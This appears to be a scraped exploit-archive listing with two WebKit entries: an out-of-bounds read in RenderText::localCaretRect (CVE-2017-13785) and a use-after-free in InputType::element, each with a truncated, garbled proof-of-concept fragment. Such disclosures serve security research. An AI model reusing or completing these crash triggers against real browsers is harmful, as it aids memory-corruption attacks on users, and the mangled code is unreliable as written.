WebKit WebCore::RenderText::localCaretRect Out-Of-Bounds Read

WebKit: out-of-bounds read in WebCore::RenderText::localCaretRect CVE-2017-13785 There is an out-of-bounds read security vulnerability in WebKit. The vulnerability was confirmed on ASan build of WebKit nightly. PoC: ================================================================= max-height: 0;...

WebKit - WebCore::InputType::element Use-After-Free Exploit

Exploit for multiple platform in category dos / poc var runcount = 0; function go runcount++; ifruncount 2 return; i.type = "foo"; i.select; i.type = "search"; document.onsearch = document.body.onload; document.execCommand"insertHTML", false, ""; !--...